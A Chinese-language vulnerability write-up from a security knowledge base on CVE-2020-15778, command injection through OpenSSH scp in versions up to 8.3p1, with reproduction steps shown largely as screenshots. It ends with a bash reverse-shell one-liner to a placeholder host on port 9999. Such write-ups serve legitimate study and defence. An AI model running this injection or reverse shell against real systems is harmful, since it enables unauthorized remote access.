menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right OpenSSH chevron_right OpenSSH 命令注入漏洞 CVE-2020-15778.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    OpenSSH 命令注入漏洞 CVE-2020-15778.md
    845 B / 2021-04-15 12:15:24
        # OpenSSH 命令注入漏洞 CVE-2020-15778
    
    ## 漏洞描述
    
    2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > OpenSSH <= 8.3p1
    
    ## 漏洞复现
    
    > [!NOTE]
    >
    > 可用于目标不允许远程登录但SCP开启的情况下远程命令执行
    
    攻击机创建 peiqi.txt ,利用 scp上传文件 到 /tmp 目录下
    
    ![](image/ssh-1.png)
    
    执行命令 ping dnslog
    
    ![](image/ssh-2.png)
    
    反弹shell 更换命令即可
    
    ```
    /bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1
    ```
    
    
    
    links
    file_download